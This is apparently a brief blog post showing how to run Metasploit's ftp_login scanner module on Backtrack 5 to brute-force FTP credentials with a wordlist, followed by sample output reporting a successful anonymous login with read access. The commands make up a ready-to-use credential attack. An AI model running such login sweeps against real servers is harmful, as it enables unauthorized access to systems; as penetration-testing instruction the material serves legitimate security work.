control – metasploit ftp_login

Backtrack 5 r1

msfconsole
use auxiliary/scanner/ftp/ftp_login
set pass_file /opt/framework/msf3/data/wordlists/namelist.txt
set rhosts (ip address)
exploit

(note /opt/framework/msf3/data/wordlists is full of diffrent wordlists you may desire to change from one to another for diffrent enviroments)

[*] (ip address):21 – Starting FTP login sweep
[*] Connecting to FTP server (ip address):21…
[*] Connected to target FTP server.
[*] (ip address):21 – FTP Banner: ‘220 Microsoft FTP Service\x0d\x0a’
[*] (ip address):21 FTP – Attempting FTP login for ‘anonymous’:’User@’
[+] (ip address):21 – Successful FTP login for ‘anonymous’:’User@’
[*] (ip address):21 – User ‘anonymous’ has READ access
[*] Successful authentication with read access on (ip address) will not be reported
[*] (ip address):21 FTP – [0001/1000] – Attempting FTP login for ”:’123456′
[*] Connecting to FTP server (ip address):21…
[*] Connected to target FTP server.
[-] (ip address):21 FTP – [0001/1000] – The server rejected username: ”
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(ftp_login) >

Leave a comment